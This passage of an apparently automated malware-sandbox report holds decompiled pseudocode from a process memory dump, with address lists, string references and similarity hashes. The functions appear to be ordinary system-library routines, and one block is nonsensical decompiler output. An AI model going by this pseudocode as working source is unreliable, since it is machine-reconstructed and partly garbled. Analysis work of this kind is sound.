						_t88 = E018E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E018A9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x018e51be
0x018e51c3
0x018e51c8
0x018e51cd
0x018e51d0
0x018e51d3
0x018e51d8
0x018e51db
0x018e51de
0x018e51e0
0x018e51e3
0x018e51e6
0x018e51e8
0x018e5342
0x018e5351
0x018e5356
0x018e535a
0x018e5360
0x018e5363
0x018e5366
0x018e5369
0x018e5369
0x018e536b
0x018e536b
0x018e5370
0x018e53a3
0x018e53a4
0x018e53a6
0x018e53ab
0x018e53ab
0x018e53ae
0x018e53ae
0x018e53b5
0x018e53bf
0x018e53bf
0x018e5375
0x018e5396
0x018e53a0
0x018e53a0
0x00000000
0x018e5396
0x018e5377
0x018e5379
0x018e537f
0x018e538c
0x018e5390
0x00000000
0x018e5390
0x018e51ee
0x018e51f1
0x018e5301
0x018e5310
0x018e5315
0x018e5318
0x018e531b
0x018e5320
0x018e532e
0x018e5331
0x00000000
0x018e5331
0x018e5328
0x018e5329
0x00000000
0x018e5329
0x018e51fa
0x018e5235
0x018e5236
0x018e5239
0x018e523f
0x018e5240
0x018e5241
0x018e5242
0x018e5246
0x018e5247
0x018e524e
0x018e5251
0x018e5267
0x018e5269
0x018e526e
0x018e527d
0x018e527e
0x018e5281
0x018e5282
0x018e5287
0x018e5288
0x018e528a
0x018e528f
0x018e5294
0x00000000
0x00000000
0x018e529a
0x018e529c
0x018e529e
0x018e529e
0x018e52a4
0x018e52b0
0x00000000
0x00000000
0x018e52ba
0x018e52bc
0x018e52bc
0x018e52d4
0x018e52d9
0x018e52dc
0x018e52e1
0x00000000
0x00000000
0x018e52e7
0x018e52f4
0x00000000
0x018e52f4
0x018e5270
0x00000000
0x018e5270
0x018e51fc
0x018e51fd
0x018e5202
0x018e5203
0x018e5205
0x018e520a
0x018e520f
0x00000000
0x00000000
0x018e521b
0x018e5226
0x018e522b
0x018e521d
0x018e521d
0x018e5222
0x018e5222
0x018e522d
0x00000000

Strings

Legacy, xrefs: 018E5226
UEFI, xrefs: 018E521D

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 2f9bbdf12dc533f0597e9a2fa716e5a3e402f61175346db58c91dc11b89b70c2
Instruction ID: 4ba6ab2a36fe035ab3133ebc188fd465fb4faadcbf3ebcd300ec25e1ecb6a756
Opcode Fuzzy Hash: 2f9bbdf12dc533f0597e9a2fa716e5a3e402f61175346db58c91dc11b89b70c2
Instruction Fuzzy Hash: 5D516D75E006099FDB24DFA8C894AADBBF8FF4A708F14402DE659EB251DB71DA00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01892581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E01892581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912133) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t246;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				signed int _t257;
				signed int _t264;
				signed int _t267;
				signed int _t275;
				signed int _t281;
				signed int _t283;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				signed int* _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int* _t339;

				_t334 = _t336;
				_t337 = _t336 - 0x4c;
				_v8 =  *0x195d360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x195b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t281 = 0x48;
				_t309 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t320 = 0;
				_v37 = _t309;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L01884620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t309 = _v32;
							 *(_t327 + 0x3c) = _t281;
							_t283 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t309 - 0x1958478;
								 *_t327 = ((0 | _t309 == 0x01958478) - 0x00000001 & 0xfffffffb) + 7;
								E018AF3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t337 = _t337 + 0xc;
								_t283 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t275 = E018F39F2(_t322);
									_t309 = _v32;
									_t322 = _t275;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t281 = _t327 + _t283 * 4;
								_v56 = _t281;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t240 =  *(_v60 + _t293 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t281 =  *(_v60 + _t293 * 4);
										 *(_t281 + 0x18) = _t322;
										_t244 =  *(_v60 + _t293 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01892959))) {
												case 0:
													__ax =  *0x1958488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E018AF3E0(__edi,  *0x195848c, __ax & 0x0000ffff);
														__eax =  *0x1958488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E018AF3E0(_t322, _v80, _v64);
													_t270 = _v64;
													goto L26;
												case 2:
													 *0x1958480 & 0x0000ffff = E018AF3E0(__edi,  *0x1958484,  *0x1958480 & 0x0000ffff);
													__eax =  *0x1958480 & 0x0000ffff;
													__eax = ( *0x1958480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E018AF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E018AF3E0(_t322, _v76, _v36);
														_t270 = _v36;
													}
													L26:
													_t337 = _t337 + 0xc;
													_t322 = _t322 + (_t270 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t272);
													 *((short*)(_t322 - 2)) = _t272;
													goto L28;
												case 6:
													__ebx =  *0x195575c;
													__eflags = __ebx - 0x195575c;
													if(__ebx != 0x195575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E018AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x195575c;
														} while (__ebx != 0x195575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1958478 & 0x0000ffff = E018AF3E0(__edi,  *0x195847c,  *0x1958478 & 0x0000ffff);
													__eax =  *0x1958478 & 0x0000ffff;
													__eax = ( *0x1958478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018F39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1956e58 & 0x0000ffff = E018AF3E0(__edi,  *0x1956e5c,  *0x1956e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1956e58 & 0x0000ffff;
													__eax = ( *0x1956e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t309 = _v32;
													L29:
													_t281 = _t281 + 4;
													__eflags = _t281;
													_v56 = _t281;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t320 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01892935))) {
							case 0:
								__ax =  *0x1958488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E01892E3E(0,  &_v64);
								_t281 = _t281 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1958480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1958480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0187EEF0(0x19579a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0187EB70(__ecx, 0x19579a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1957b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01884620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0187EB70(__ecx, 0x19579a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t334;
										_pop(_t282);
										return E018AB640(_t219, _t282, _v8 ^ _t334, _t309, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t277 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t279 = E01892E3E(_t277,  &_v36);
									_t289 = _v36;
									_v76 = _t279;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t281 = _t281 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0x1955764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1958478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1958478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1956e58 & 0x0000ffff;
								__eax = ( *0x1956e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t294 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t294 = _t244;
					asm("o16 sub [ecx-0x76d81fff], cl");
					 *_t327 =  *_t327 + _t334;
					 *[es:ecx] = _t244;
					_t330 = _t327 + 1;
					 *((intOrPtr*)(_t294 - 0x76d9faff)) =  *((intOrPtr*)(_t294 - 0x76d9faff)) - _t294;
					 *_t322 =  *_t322 + _t281;
					_pop(_t285);
					_t246 = _t337;
					_t339 = _t294;
					 *((intOrPtr*)(_t294 - 0x72a4caff)) =  *((intOrPtr*)(_t294 - 0x72a4caff)) - _t294;
					 *_t309 =  *_t309 + _t246;
					 *((intOrPtr*)(_t294 - 0x76d77fff)) =  *((intOrPtr*)(_t294 - 0x76d77fff)) - _t294;
					_t331 = _t327 + 1 + _t330;
					asm("daa");
					 *_t294 = _t246;
					_push(ds);
					 *((intOrPtr*)(_t294 - 0x76d7b1ff)) =  *((intOrPtr*)(_t294 - 0x76d7b1ff)) - _t294;
					_a35 = _a35 + _t285;
					 *_t294 = _t246;
					asm("fcomp dword [ebx-0x73]");
					 *((intOrPtr*)(_t246 +  &_a1546912133)) =  *((intOrPtr*)(_t246 +  &_a1546912133)) + _t327 + 1 + _t330;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x193ff00);
					E018BD08C(_t285, _t322, _t331);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t286 = _a12;
					__eflags = _t286;
					if(_t286 == 0) {
						_t250 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t252 = 4;
						while(1) {
							_v40 = _t252;
							__eflags = _t252;
							if(_t252 == 0) {
								break;
							}
							_t299 = _t252 * 0xc;
							_v48 = _t299;
							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x1841664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t267 = E018AE5C0(_a8,  *((intOrPtr*)(_t299 + 0x1841668)), _t286);
									_t339 =  &(_t339[3]);
									__eflags = _t267;
									if(__eflags == 0) {
										_t332 = E018E51BE(_t286,  *((intOrPtr*)(_v48 + 0x184166c)), _a16, _t323, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t252 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t252 = _t252 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t323;
									if( *_t295 == _t323) {
										_t332 = 0xc0000100;
										goto L76;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t254 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t254 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t254 + 0x48)) == _t295) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L106:
												_t332 = E01892AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L69;
												} else {
													_t323 = 1;
													_t295 = _v36;
													goto L75;
												}
											} else {
												_t257 = E01876600( *(_t311 + 0x1c));
												__eflags = _t257;
												if(_t257 != 0) {
													goto L106;
												} else {
													_t295 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t332 = E01892C50(_t295, _a8, _t286, _a16, _a20, _a24, _t323);
											L76:
											_v32 = _t332;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0187EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t264 = E01892AE4( &_v36, _a8, _t286, _a16, _a20, _t332);
									_v32 = _t264;
									__eflags = _t264 - 0xc0000100;
									if(_t264 == 0xc0000100) {
										_v32 = E01892C50(_v36, _a8, _t286, _a16, _a20, _t332, 1);
									}
									_v8 = _t323;
									E01892ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t250 = _t332;
					}
					L70:
					return E018BD0D1(_t250);
				}
				L108:
			}

0x01892584
0x01892586
0x01892590
0x01892596
0x01892597
0x01892598
0x01892599
0x0189259e
0x018925a4
0x018925a9
0x018925ac
0x018925ae
0x018925b1
0x018925b2
0x018925b5
0x018925b8
0x018925bb
0x018925bc
0x018925bf
0x018925c2
0x018925c5
0x018925c6
0x018925cb
0x018925ce
0x018925d8
0x018925dd
0x018925de
0x018925e1
0x018925e3
0x018925e9
0x018926da
0x018926da
0x018926dd
0x018926e2
0x018d5b56
0x00000000
0x018926e8
0x018926f9
0x018926fb
0x018926fe
0x01892700
0x018d5b60
0x00000000
0x01892706
0x01892706
0x0189270a
0x0189270a
0x0189270d
0x01892713
0x01892716
0x01892718
0x0189271c
0x0189271e
0x018d5b6c
0x018d5b6f
0x018d5b7f
0x018d5b89
0x018d5b8e
0x018d5b93
0x018d5b96
0x018d5b9c
0x018d5ba0
0x018d5ba3
0x018d5bab
0x018d5bb0
0x018d5bb3
0x018d5bb3
0x018d5ba3
0x01892724
0x01892726
0x01892729
0x0189272c
0x0189279d
0x0189279d
0x018927a0
0x018927a2
0x00000000
0x0189272e
0x0189272e
0x01892731
0x01892734
0x01892734
0x01892736
0x018d5bc1
0x018d5bc1
0x018d5bc4
0x00000000
0x018d5bca
0x018d5bca
0x018d5bcd
0x00000000
0x018d5bd3
0x00000000
0x018d5bd3
0x018d5bcd
0x0189273c
0x0189273c
0x01892742
0x01892747
0x0189274a
0x0189274d
0x01892750
0x00000000
0x01892756
0x01892756
0x00000000
0x01892902
0x01892908
0x0189290b
0x00000000
0x01892911
0x0189291c
0x01892921
0x00000000
0x01892921
0x00000000
0x00000000
0x01892880
0x01892887
0x0189288c
0x00000000
0x00000000
0x01892805
0x0189280a
0x01892814
0x01892816
0x00000000
0x00000000
0x0189281e
0x01892821
0x01892823
0x00000000
0x01892829
0x01892829
0x01892831
0x0189283c
0x0189283e
0x00000000
0x0189283e
0x00000000
0x00000000
0x0189284e
0x01892850
0x01892851
0x01892854
0x01892857
0x0189285a
0x0189285c
0x0189285d
0x00000000
0x00000000
0x0189275d
0x01892761
0x00000000
0x01892767
0x0189276e
0x01892773
0x01892773
0x01892776
0x01892778
0x0189277e
0x0189277e
0x01892781
0x01892781
0x01892783
0x01892784
0x00000000
0x00000000
0x018d5bd8
0x018d5bde
0x018d5be4
0x018d5be6
0x018d5be8
0x018d5be9
0x018d5bee
0x018d5bf8
0x018d5bff
0x018d5c01
0x018d5c04
0x018d5c07
0x018d5c0b
0x018d5c0d
0x018d5c0d
0x018d5c15
0x018d5c18
0x018d5c1b
0x018d5c1b
0x018d5c1e
0x00000000
0x00000000
0x018928c3
0x018928c8
0x018928d2
0x018928d4
0x018928d8
0x018928db
0x018d5c26
0x018d5c28
0x018d5c2d
0x018d5c2d
0x00000000
0x00000000
0x018d5c34
0x018d5c36
0x018d5c49
0x018d5c4e
0x018d5c54
0x018d5c5b
0x018d5c5d
0x018d5c60
0x01892788
0x01892788
0x0189278b
0x0189278e
0x0189278e
0x0189278e
0x01892791
0x00000000
0x00000000
0x01892756
0x01892750
0x00000000
0x01892794
0x01892794
0x01892795
0x01892798
0x01892798
0x00000000
0x01892734
0x0189272c
0x01892700
0x018925ef
0x018925ef
0x018925ef
0x018925f2
0x018925f8
0x00000000
0x00000000
0x018925fe
0x00000000
0x018928e6
0x018928ec
0x018928ef
0x018928f5
0x018928f8
0x018928f8
0x00000000
0x018928f8
0x00000000
0x00000000
0x01892866
0x01892866
0x01892876
0x01892879
0x00000000
0x00000000
0x018927e0
0x018927e7
0x018927e9
0x018927eb
0x018d5afd
0x00000000
0x018d5afd
0x00000000
0x00000000
0x01892633
0x01892638
0x0189263b
0x0189263c
0x0189263e
0x01892640
0x01892642
0x01892647
0x01892649
0x0189264e
0x01892650
0x01892653
0x01892659
0x018926a2
0x018926a7
0x018926ac
0x018926b2
0x018d5b11
0x018d5b15
0x018d5b17
0x00000000
0x018926b8
0x018926b8
0x018926ba
0x018927a6
0x018927a6
0x018927a9
0x018927ab
0x018927b9
0x018927b9
0x018927be
0x018927c1
0x018927c3
0x018927c5
0x018927c7
0x018d5c74
0x018d5c79
0x018d5c79
0x018927c7
0x00000000
0x018926c0
0x018926c0
0x018926c3
0x018926c6
0x018926c6
0x018926c9
0x018926c9
0x00000000
0x018926c9
0x018926ba
0x0189265b
0x0189265b
0x0189265e
0x01892667
0x0189266d
0x01892677
0x0189267c
0x0189267f
0x01892681
0x018d5b49
0x018d5b4e
0x018927cd
0x018927d0
0x018927d1
0x018927d2
0x018927d4
0x018927dd
0x01892687
0x01892687
0x0189268a
0x0189268b
0x0189268e
0x0189268f
0x01892691
0x01892696
0x01892698
0x0189269d
0x0189269f
0x00000000
0x0189269f
0x01892681
0x00000000
0x00000000
0x01892846
0x00000000
0x00000000
0x01892605
0x0189260a
0x0189260c
0x01892611
0x01892616
0x01892619
0x01892619
0x0189261e
0x00000000
0x01892624
0x01892627
0x01892627
0x00000000
0x00000000
0x018d5b1f
0x00000000
0x00000000
0x01892894
0x0189289b
0x0189289d
0x018928a1
0x018d5b2b
0x018d5b2e
0x018d5b2e
0x018928a7
0x018928a9
0x018d5b04
0x018d5b09
0x018d5b09
0x018d5b09
0x00000000
0x00000000
0x018d5b35
0x018d5b3c
0x018928fb
0x018928fb
0x018926cc
0x018926cc
0x018926d0
0x00000000
0x018926d2
0x018926d2
0x00000000
0x018926d2
0x00000000
0x00000000
0x018925fe
0x0189292d
0x0189292f
0x01892930
0x01892935
0x01892937
0x01892939
0x01892940
0x01892942
0x01892945
0x01892946
0x0189294c
0x0189294e
0x01892951
0x01892951
0x01892952
0x01892958
0x0189295a
0x01892960
0x01892962
0x01892963
0x01892965
0x01892966
0x0189296c
0x0189296f
0x01892971
0x01892974
0x0189297d
0x0189297e
0x0189297f
0x01892980
0x01892981
0x01892982
0x01892983
0x01892984
0x01892985
0x01892986
0x01892987
0x01892988
0x01892989
0x0189298a
0x0189298b
0x0189298c
0x0189298d
0x0189298e
0x0189298f
0x01892990
0x01892992
0x01892997
0x018929a3
0x018929a6
0x018929ab
0x018929ad
0x018929b0
0x018929b2
0x018d5c80
0x018929b8
0x018929b8
0x018929bb
0x018929c0
0x018929c5
0x018929c6
0x018929c6
0x018929c9
0x018929cb
0x00000000
0x00000000
0x018929cd
0x018929d0
0x018929d9
0x018929db
0x018929dd
0x01892a7f
0x01892a84
0x01892a87
0x01892a89
0x018d5ca1
0x018d5ca3
0x00000000
0x01892a8f
0x01892a8f
0x00000000
0x01892a8f
0x00000000
0x018929e3
0x018929e3
0x018929e3
0x00000000
0x018929e3
0x018929dd
0x00000000
0x018929db
0x018929e6
0x018929e9
0x018929eb
0x018929ed
0x018929f3
0x018929f5
0x018929f8
0x018929fa
0x01892a97
0x01892a9a
0x01892a9d
0x01892add
0x00000000
0x01892a9f
0x01892aa2
0x01892aa5
0x01892aa8
0x01892aab
0x018d5cab
0x018d5caf
0x018d5cc5
0x018d5cda
0x018d5cdc
0x018d5cdf
0x018d5ce5
0x00000000
0x018d5ceb
0x018d5ced
0x018d5cee
0x00000000
0x018d5cee
0x018d5cb1
0x018d5cb4
0x018d5cb9
0x018d5cbb
0x00000000
0x018d5cbd
0x018d5cbd
0x00000000
0x018d5cbd
0x018d5cbb
0x01892ab1
0x01892ab1
0x01892ac4
0x01892ac6
0x01892ac6
0x00000000
0x01892ac6
0x01892aab
0x00000000
0x01892a00
0x01892a09
0x01892a0e
0x01892a21
0x01892a24
0x01892a35
0x01892a3a
0x01892a3d
0x01892a42
0x01892a59
0x01892a59
0x01892a5c
0x01892a5f
0x01892a5f
0x018929fa
0x018929f3
0x01892a64
0x01892a64
0x01892a6b
0x01892a6b
0x01892a6d
0x01892a72
0x01892a72
0x00000000

Strings

PATH, xrefs: 01892642, 01892691

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 9e284a87d900e8f05abc5840c8f2ac7933b638f78c99629911202d1955ef0037
Instruction ID: 7f63086e72d3324f2c2e74cded30d9b7cd8652711d2a7c200b5fd88e7f119fbe
Opcode Fuzzy Hash: 9e284a87d900e8f05abc5840c8f2ac7933b638f78c99629911202d1955ef0037
Instruction Fuzzy Hash: 12C17F75D00219ABDF25DF9DD881ABDBBB6FF48744F484029E901FB250D734AA41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0189FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0189FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0187EEF0(0x1957b60);
					_t134 =  *0x1957b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1957b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1957b60);
